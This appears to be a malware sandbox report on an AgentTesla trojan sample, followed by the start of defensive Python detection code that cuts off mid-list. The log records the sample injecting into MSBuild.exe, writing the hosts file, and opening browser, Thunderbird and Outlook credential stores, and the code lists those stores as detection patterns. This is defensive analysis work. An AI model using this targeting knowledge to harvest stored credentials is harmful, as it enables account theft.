Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SHOWG.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\STENCIL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\VINERITC.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\VIVALDII.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LATINWD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCM_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCMI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCB_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCBI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCCM____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCKEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ROCCB___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\RAGE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERTILI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERTIBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PER_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PERBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\PALSCRI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MAIAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LTYPE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LTYPEO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LTYPEB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LSANS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\FRABKIT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Queries volume information: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | VolumeInformation
Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Queries volume information: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | VolumeInformation
Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll | VolumeInformation
Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll | VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File written: C:\Windows\System32\drivers\etc\hosts

                    Stealing of Sensitive Information

Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
Source: Yara match | File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.313568492.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.312741390.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.311813738.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe PID: 6260, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match | File source: 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 6856, type: MEMORYSTR
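The artifacts recorded above under Lowering of HIPS / PFW / Operating System Security Settings (MSBuild.exe writing the hosts file) and Stealing of Sensitive Information (MSBuild.exe opening the Thunderbird, Firefox and Chrome credential stores and the IncrediMail and Outlook profile keys) translate directly into endpoint detection logic. The Python below is an added example, not part of the Joe Sandbox report: it runs over constructed Sysmon-style events (the Image/ProcessId/EventType/Target field names, the owner allow-list and the list of .NET injection hosts are assumptions, and the sample events are modelled on the report rather than captured from it) and flags any process that opens another application's credential store or writes the hosts file, escalating when the process is a signed .NET utility such as the injected MSBuild.exe.

```python
"""Detection logic for the credential-store access and hosts-file write
behaviour observed in the report, run over constructed endpoint events.

Added example. The event shape (Image, ProcessId, EventType, Target) is an
assumed Sysmon-like layout, not the sandbox's own output format.
"""
import ntpath
from collections import defaultdict

# Artifacts taken from the report: the credential stores the injected
# MSBuild.exe process opened, and the hosts file it wrote.
CREDENTIAL_STORE_FILES = (
    r"\appdata\roaming\thunderbird\profiles.ini",
    r"\appdata\roaming\mozilla\firefox\profiles.ini",
    r"\appdata\local\google\chrome\user data\default\login data",
)
CREDENTIAL_STORE_KEYS = {
    r"hkey_current_user\software\incredimail\identities",
    r"hkey_current_user\software\microsoft\windows nt\currentversion"
    r"\windows messaging subsystem\profiles\outlook\9375cff0413111d3b88a00104b2a6676",
}
HOSTS_FILE = r"c:\windows\system32\drivers\etc\hosts"

# Assumed allow-list: the applications that legitimately own the stores above.
STORE_OWNERS = {"chrome.exe", "firefox.exe", "thunderbird.exe", "outlook.exe", "incmail.exe"}
# Assumed list of signed .NET utilities commonly hollowed by .NET loaders
# (MSBuild.exe is the host in this report).
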